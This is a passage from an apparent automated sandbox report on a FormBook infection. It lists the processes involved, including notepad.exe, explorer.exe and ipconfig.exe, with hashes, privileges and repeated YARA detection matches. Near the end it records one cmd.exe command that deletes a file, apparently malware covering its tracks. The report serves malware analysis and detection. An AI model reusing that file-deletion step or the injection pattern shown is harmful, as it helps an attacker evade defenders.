                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.958771208.0000000003666000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Antivirus matches:
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 24%, ReversingLabs
                                                Reputation:low

                                                Target ID:9
                                                Start time:18:38:34
                                                Start date:08/08/2022
                                                Path:C:\Windows\SysWOW64\notepad.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\notepad.exe /Processid:{2BA893A4-E786-4AE6-9111-3506DE199247}
                                                Imagebase:0x660000
                                                File size:179712 bytes
                                                MD5 hash:A4F6DF0E33E644E802C8798ED94D80EA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1043439197.0000000000150000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.948702057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.947984971.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1043648372.00000000002C0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.939194134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.938868025.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.1043727096.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000000.948326848.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

Target ID: 10
Start time: 18:38:41
Start date: 08/08/2022
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0xff040000
File size: 3229696 bytes
MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.987721089.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.1004582452.0000000002992000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high

Target ID: 11
Start time: 18:39:20
Start date: 08/08/2022
Path: C:\Windows\SysWOW64\ipconfig.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\ipconfig.exe
Imagebase: 0x370000
File size: 27136 bytes
MD5 hash: CABB20E171770FF64614A54C1F31C033
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175369847.0000000000260000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175496063.0000000000290000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.1175083933.0000000000080000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

Target ID: 12
Start time: 18:39:25
Start date: 08/08/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del "C:\Windows\SysWOW64\notepad.exe"
Imagebase: 0x4ab40000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

No disassembly